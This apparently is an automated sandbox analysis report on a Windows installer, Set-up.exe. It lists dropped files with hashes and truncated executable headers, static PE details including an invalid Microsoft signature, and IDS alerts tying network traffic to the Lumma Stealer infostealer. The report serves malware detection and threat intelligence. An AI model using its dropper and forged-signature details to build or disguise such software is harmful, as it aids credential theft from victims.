                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxi01wbt.d3y.ps1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ug2sygpn.2t4.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_isdecmp.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):35616
                                                                                                                                                Entropy (8bit):6.953519176025623
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: installer_1.05_36.5.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: MdhO83N5Fm.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: appFile.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: FloydMounts.exe, Detection: malicious, Browse
                                                                                                                                                • Filename: cho_mea64.exe, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-2E9FA.tmp\_isetup\_setup64.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6144
                                                                                                                                                Entropy (8bit):4.720366600008286
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3367424
                                                                                                                                                Entropy (8bit):6.530011244733973
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_isdecmp.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):35616
                                                                                                                                                Entropy (8bit):6.953519176025623
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-DNDCK.tmp\_isetup\_setup64.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6144
                                                                                                                                                Entropy (8bit):4.720366600008286
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3367424
                                                                                                                                                Entropy (8bit):6.530011244733973
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):846325235
                                                                                                                                                Entropy (8bit):0.13954043794048707
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:
                                                                                                                                                MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\ColorStreamLib\is-F9S0P.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):846325235
                                                                                                                                                Entropy (8bit):0.13954043794048707
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:
                                                                                                                                                MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Entropy (8bit):0.45213366655733644
                                                                                                                                                TrID:
                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                File name:Set-up.exe
                                                                                                                                                File size:75'269'806 bytes
                                                                                                                                                MD5:b92ee6aff573d5f6aec1cfd748fe3ccb
                                                                                                                                                SHA1:203fd74f67e7013de56b3dc56e44d816437cc960
                                                                                                                                                SHA256:ba34710ae9f0fe471ded943e84a8dbce2ad241fe550dc3e4e66a5062a978058c
                                                                                                                                                SHA512:b6894a00781a8a77ce4ec0ea7caf66a2e5a51e517478dca00f35880f149c951eeac1cbf98f1c344d2cb57f5cbfc3182414349a8b9be75dc5c8b6d221c663cdd4
                                                                                                                                                SSDEEP:24576:fzJcU2+gtvvkECK7NrnI4KjbLTK39rNtrOct:fzJF2+gv/rnITjzKtrNtSct
                                                                                                                                                TLSH:28F76CBF5730BFB08B42C4650936DEDC95FA690A131194E7334A6D06FD8B8D84B3A86D
                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,.].h.3.h.3.h.3...?.j.3...=.r.3.^.9.3.3...l.i.3.h.2...3...n.o.3.^.8...3.....H.3.....j.3...5.i.3.Richh.3........................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                                Static PE Info

                                                                                                                                                General

                                                                                                                                                Entrypoint:0x46d354
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:true
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:
                                                                                                                                                Time Stamp:0x4DAC88CC [Mon Apr 18 18:54:04 2011 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:341ad42f1c1323de5177f7ee5eace0b4

                                                                                                                                                Authenticode Signature

                                                                                                                                                Signature Valid:false
                                                                                                                                                Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                Error Number:-2146869232
                                                                                                                                                Not Before, Not After
                                                                                                                                                • 15/12/2020 22:24:20 02/12/2021 22:24:20
                                                                                                                                                Subject Chain
                                                                                                                                                • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                Version:3
                                                                                                                                                Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                                                                Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                                                                Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                                                                Serial:33000003DFFB6AE3F427ECB6A30000000003DF

                                                                                                                                                Entrypoint Preview

                                                                                                                                                Instruction
                                                                                                                                                push ebp
                                                                                                                                                mov ebp, esp
                                                                                                                                                push FFFFFFFFh
                                                                                                                                                push 0047CC90h
                                                                                                                                                push 0046D27Ch
                                                                                                                                                mov eax, dword ptr fs:[00000000h]
                                                                                                                                                push eax
                                                                                                                                                mov dword ptr fs:[00000000h], esp
                                                                                                                                                sub esp, 10h
                                                                                                                                                push ebx
                                                                                                                                                push esi
                                                                                                                                                push edi
                                                                                                                                                mov dword ptr [ebp-18h], esp
                                                                                                                                                call dword ptr [0047A190h]
                                                                                                                                                xor edx, edx
                                                                                                                                                mov dl, ah
                                                                                                                                                mov dword ptr [00493434h], edx
                                                                                                                                                mov ecx, eax
                                                                                                                                                and ecx, 000000FFh
                                                                                                                                                mov dword ptr [00493430h], ecx
                                                                                                                                                shl ecx, 08h
                                                                                                                                                add ecx, edx
                                                                                                                                                mov dword ptr [0049342Ch], ecx
                                                                                                                                                shr eax, 10h
                                                                                                                                                mov dword ptr [00493428h], eax
                                                                                                                                                push 00000001h
                                                                                                                                                call 00007F2FF0C75EA9h
                                                                                                                                                pop ecx
                                                                                                                                                test eax, eax
                                                                                                                                                jne 00007F2FF0C74C7Ah
                                                                                                                                                push 0000001Ch
                                                                                                                                                call 00007F2FF0C74D20h
                                                                                                                                                pop ecx
                                                                                                                                                call 00007F2FF0C7574Dh
                                                                                                                                                test eax, eax
                                                                                                                                                jne 00007F2FF0C74C7Ah
                                                                                                                                                push 00000010h
                                                                                                                                                call 00007F2FF0C74D0Fh
                                                                                                                                                pop ecx
                                                                                                                                                and dword ptr [ebp-04h], 00000000h
                                                                                                                                                call 00007F2FF0C770F3h
                                                                                                                                                call dword ptr [0047A18Ch]
                                                                                                                                                mov dword ptr [004962BCh], eax
                                                                                                                                                call 00007F2FF0C77EE2h
                                                                                                                                                mov dword ptr [004933A8h], eax
                                                                                                                                                call 00007F2FF0C77C8Bh
                                                                                                                                                call 00007F2FF0C77BCDh
                                                                                                                                                call 00007F2FF0C75AC0h
                                                                                                                                                mov eax, dword ptr [00493444h]
                                                                                                                                                mov dword ptr [00493448h], eax
                                                                                                                                                push eax
                                                                                                                                                push dword ptr [0049343Ch]
                                                                                                                                                push dword ptr [00493438h]
                                                                                                                                                call 00007F2FF0C0CB0Dh
                                                                                                                                                add esp, 0Ch

                                                                                                                                                Rich Headers

                                                                                                                                                Programming Language:
                                                                                                                                                • [ C ] VS98 (6.0) SP6 build 8804
                                                                                                                                                • [C++] VS98 (6.0) SP6 build 8804
                                                                                                                                                • [ C ] VS2010 build 30319
                                                                                                                                                • [ASM] VS2010 build 30319
                                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x889f40x50.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x990000x4fc00.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x47c64de0x21d0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x7a0000x238.rdata
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x10000x787e10x7880054dc9034f855123270a7abbb716ae1a9False0.5701727016338174data6.685258921744927IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rdata0x7a0000xf6180xf800b0cfc3329743aaf81f3c7aaabc54ddb3False0.30344317036290325data4.073250457877279IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .data0x8a0000xd2e40x6800e977665f5c53c9f3cbb67e8f4bf8906fFalse0.28662109375data3.3790025727805575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .sxdata0x980000x40x20035925cfdc1176bd9ffc634a58b40ec17False0.02734375data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                .rsrc0x990000x4fc000x4fc00fbe670598d6c0d31bb517a3bbc4e467fFalse0.6865938479623824data7.579823470331887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_VERSION0x990580x2acdataChineseChina0.5248538011695907

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                OLEAUT32.dllSysAllocString, SysAllocStringByteLen, VariantClear, VariantCopy, SysFreeString
                                                                                                                                                USER32.dllCharLowerA, CharNextA, CharUpperW, CharLowerW, CharPrevExA, CharUpperA
                                                                                                                                                KERNEL32.dllSetEndOfFile, GetStringTypeW, GetStringTypeA, LCMapStringW, SetConsoleCtrlHandler, FileTimeToLocalFileTime, GetCommandLineW, SetFileApisToOEM, GetVersionExA, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, GetConsoleMode, SetConsoleMode, GetStdHandle, MultiByteToWideChar, WideCharToMultiByte, GetLastError, FreeLibrary, LoadLibraryW, LoadLibraryA, GetModuleFileNameW, GetModuleFileNameA, LocalFree, FormatMessageW, FormatMessageA, CloseHandle, SetFileTime, CreateFileW, SetLastError, SetFileAttributesW, SetFileAttributesA, RemoveDirectoryW, RemoveDirectoryA, MoveFileW, MoveFileA, CreateDirectoryW, CreateDirectoryA, DeleteFileW, DeleteFileA, GetFullPathNameW, GetFullPathNameA, SetCurrentDirectoryW, SetCurrentDirectoryA, GetCurrentDirectoryW, GetCurrentDirectoryA, GetTempPathW, GetTempPathA, GetCurrentProcessId, GetTickCount, GetCurrentThreadId, FindClose, FindFirstFileW, FindFirstFileA, FindNextFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, DeviceIoControl, ReadFile, WriteFile, GetCurrentProcess, GetProcAddress, CompareFileTime, FileTimeToSystemTime, GetSystemInfo, GlobalMemoryStatus, GetModuleHandleA, DosDateTimeToFileTime, FileTimeToDosDateTime, SystemTimeToFileTime, GetSystemTime, WaitForMultipleObjects, OpenEventA, UnmapViewOfFile, MapViewOfFile, OpenFileMappingA, GetProcessTimes, LocalFileTimeToFileTime, QueryPerformanceCounter, VirtualAlloc, VirtualFree, WaitForSingleObject, CreateEventA, SetEvent, ResetEvent, CreateSemaphoreA, ReleaseSemaphore, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, TlsSetValue, TlsGetValue, ExitThread, GetCommandLineA, GetVersion, ExitProcess, TlsAlloc, SetUnhandledExceptionFilter, TerminateProcess, HeapSize, GetEnvironmentVariableA, HeapDestroy, HeapCreate, IsBadWritePtr, SetHandleCount, GetFileType, GetStartupInfoA, FlushFileBuffers, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStrings, GetEnvironmentStringsW, IsBadReadPtr, IsBadCodePtr, SetStdHandle, GetCPInfo, GetACP, GetOEMCP, InterlockedDecrement, InterlockedIncrement, LCMapStringA

                                                                                                                                                Possible Origin

                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                ChineseChina

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-12-30T18:13:09.982569+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704188.114.96.3443TCP
                                                                                                                                                2024-12-30T18:13:10.457108+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704188.114.96.3443TCP
